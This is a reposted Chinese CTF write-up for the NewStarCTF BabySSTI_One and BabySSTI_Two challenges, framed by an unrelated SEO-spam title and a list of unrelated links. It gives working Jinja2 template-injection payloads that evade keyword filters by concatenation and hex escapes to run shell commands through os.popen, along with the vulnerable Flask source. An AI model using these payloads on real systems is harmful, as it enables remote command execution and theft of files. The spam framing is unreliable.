当前位置: 首页 > wzjs >正文

邯郸做网站询安联网络吉林seo推广

wzjs 2025/8/19 8:22:48
邯郸做网站询安联网络,吉林seo推广,建设工程造价网站,自助网站搭建[NewStarCTF 公开赛赛道]BabySSTI_One 测试发现过滤关键字,但是特殊符号中括号、双引号、点都能用 可以考虑拼接或者编码,这里使用拼接 ?name{{()["__cla"~"ss__"]}}?name{{()["__cla"~"ss__"]["__ba&…

[NewStarCTF 公开赛赛道]BabySSTI_One

测试发现过滤关键字,但是特殊符号中括号、双引号、点都能用

可以考虑拼接或者编码,这里使用拼接


?name={{()["__cla"~"ss__"]}}



?name={{()["__cla"~"ss__"]["__ba"~"se__"]["__subcl"~"asses__"]()}}

 直接命令执行


?name={{()["__cla"~"ss__"]["__ba"~"se__"]["__subcl"~"asses__"]()[117]["__in"~"it__"]["__glob"~"als__"]["po"~"pen"]("ls")["read"]()}}


?name={{()["__cla"~"ss__"]["__ba"~"se__"]["__subcl"~"asses__"]()[117]["__in"~"it__"]["__glob"~"als__"]["po"~"pen"]("ca"~"t"~" "~"app*")["read"]()}}

from flask import Flask, request 
from jinja2 import Template 
import re 
app = Flask(__name__) 
@app.route("/") 
def index(): name = request.args.get('name', 'CTFer') if not re.findall('class|base|init|mro|flag|cat|more|env', name): t = Template("Welcome to NewStarCTF, Dear " + name + "Try to GET me a NAME") return t.render() else: t = Template("Get Out!Hacker!") return t.render() 
if __name__ == "__main__": app.run()

根目录下


?name={{()["__cla"~"ss__"]["__ba"~"se__"]["__subcl"~"asses__"]()[117]["__in"~"it__"]["__glob"~"als__"]["po"~"pen"]("tac /fla*")["read"]()}}

[NewStarCTF 公开赛赛道]BabySSTI_Two

burp测一下过滤哪些

过滤了这些内容,可用如下

尝试十六进制编码绕过


?name={{()['\x5f\x5f\x63\x6c\x61\x73\x73\x5f\x5f']}}

 

 


#{{()['__class__']['__base__']['__subclasses__']()}}
{{()['__\x63\x6c\x61\x73\x73__']['__base__']['__\x73\x75\x62\x63\x6c\x61\x73\x73\x65\x73__']()}}


name={{(()['__\x63\x6c\x61\x73\x73__']['__base__']['__\x73\x75\x62\x63\x6c\x61\x73\x73\x65\x73__']()[117])['__\x69\x6e\x69\x74__']['__\x67\x6c\x6f\x62\x61\x6c\x73__']['\x70\x6f\x70\x65\x6e']('ls')['\x72\x65\x61\x64']()}}#    {{(()['__class__']['__base__']['__subclasses__']()[117])['__init__']['__globals__']['popen']('ls')['read']()}}

 

 flag在根目录下


?name={{(()['__\x63\x6c\x61\x73\x73__']['__base__']['__\x73\x75\x62\x63\x6c\x61\x73\x73\x65\x73__']()[117])['__\x69\x6e\x69\x74__']['__\x67\x6c\x6f\x62\x61\x6c\x73__']['\x70\x6f\x70\x65\x6e']('\x6c\x73\x20\x2f')['\x72\x65\x61\x64']()}}# {{(()['__class__']['__base__']['__subclasses__']()[117])['__init__']['__globals__']['popen']('ls /')['read']()}}?name={{(()['__\x63\x6c\x61\x73\x73__']['__base__']['__\x73\x75\x62\x63\x6c\x61\x73\x73\x65\x73__']()[117])['__\x69\x6e\x69\x74__']['__\x67\x6c\x6f\x62\x61\x6c\x73__']['\x70\x6f\x70\x65\x6e']('\x63\x61\x74\x20\x2f\x66\x6c\x61\x67\x5f\x69\x6e\x5f\x68\x33\x72\x33\x5f\x35\x32\x64\x61\x61\x64')['\x72\x65\x61\x64']()}}# {{(()['__class__']['__base__']['__subclasses__']()[117])['__init__']['__globals__']['popen']('cat /flag_in_h3r3_52daad')['read']()}}

http://www.dtcms.com/wzjs/402711.html

相关文章:

  • 阿里云主机建网站如何设计与制作网页
  • 成都成华区建设局官方网站seo网络营销技术
  • 广东省网站建设网站哪个平台推广效果好
  • 显示网站运行时间代码备案查询
  • 网络组建视频高粱seo博客
  • 做任务赚钱的正规网站网站推广技巧
  • 怎么做能上谷歌网站十大看免费行情的软件下载
  • 什么网站做护工惠州seo收费
  • 怎样在赶集微网站做微招聘信息企业快速建站
  • 服装设计网站怎么做uc信息流广告投放
  • 国外精彩网站佛山百度推广公司
  • 房产网站建设方案项目书做网络优化的公司排名
  • 那里做网站最好百度的营销方式有哪些
  • 网站制作论文优帮云快速建站
  • 深圳市九号公告海阳seo排名优化培训
  • 比较好的公司网站网络加速器
  • 下载代码的网站优化关键词排名公司
  • 合江网站建设sem是什么的英文缩写
  • 天津网站建设设计开发公司seo程序
  • 郑州高端网站建设多少钱webview播放视频
  • 网站编辑招聘信息短视频营销的特点
  • 如何做1个手机网站杭州网站关键词排名
  • 做装饰公司网站淘宝运营培训班去哪里学
  • 广州个人网站建设百度关键词优化多少钱
  • 上海做网站 公司朋友圈推广平台
  • 可以做视频推广的网站有哪些内容2345网址导航是病毒吗
  • 网站建设方案概述西安百度竞价托管公司
  • 网站设计培训课程佛山网站排名提升
  • 网站 日历插件网络推广网站的方法
  • 莒县做网站的电话seo外链发布